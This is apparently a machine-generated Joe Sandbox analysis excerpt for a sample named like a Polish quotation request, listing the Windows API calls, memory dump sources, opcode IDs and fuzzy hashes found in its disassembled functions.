                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00441585
                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                                      • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                                                                                                      • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                                                                                                      • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1925773019-0
                                                                                                                                                                                                                                                      • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                      • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                      • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                      • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                      • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                      • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                      • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                      • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4082120231-0
                                                                                                                                                                                                                                                      • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                      • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                      • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                      • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                      • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                      • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                      • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                      • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4082120231-0
                                                                                                                                                                                                                                                      • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                                                                                                      • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 288456094-0
                                                                                                                                                                                                                                                      • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                                                                                                      • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2354583917-0
                                                                                                                                                                                                                                                      • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                      • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                                                                                                      • SendMessageW.USER32(02F21A68,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                                                                                                      • SendMessageW.USER32(02F21A68,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                                                                                                      • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                                                                                                      • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004484C4
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 0044857B
                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                      • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                      • String ID: 0vH
                                                                                                                                                                                                                                                      • API String ID: 327565842-3662162768
                                                                                                                                                                                                                                                      • Opcode ID: 1f9636da89c09a42c83bc6208b2a941288b856546e602fee390546c1bf7c6d32
                                                                                                                                                                                                                                                      • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9636da89c09a42c83bc6208b2a941288b856546e602fee390546c1bf7c6d32
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                      • String ID: %lu$HH
                                                                                                                                                                                                                                                      • API String ID: 3164766367-3924996404
                                                                                                                                                                                                                                                      • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                      • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                                                                                                                                                        • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                                                                                                      • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                      • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
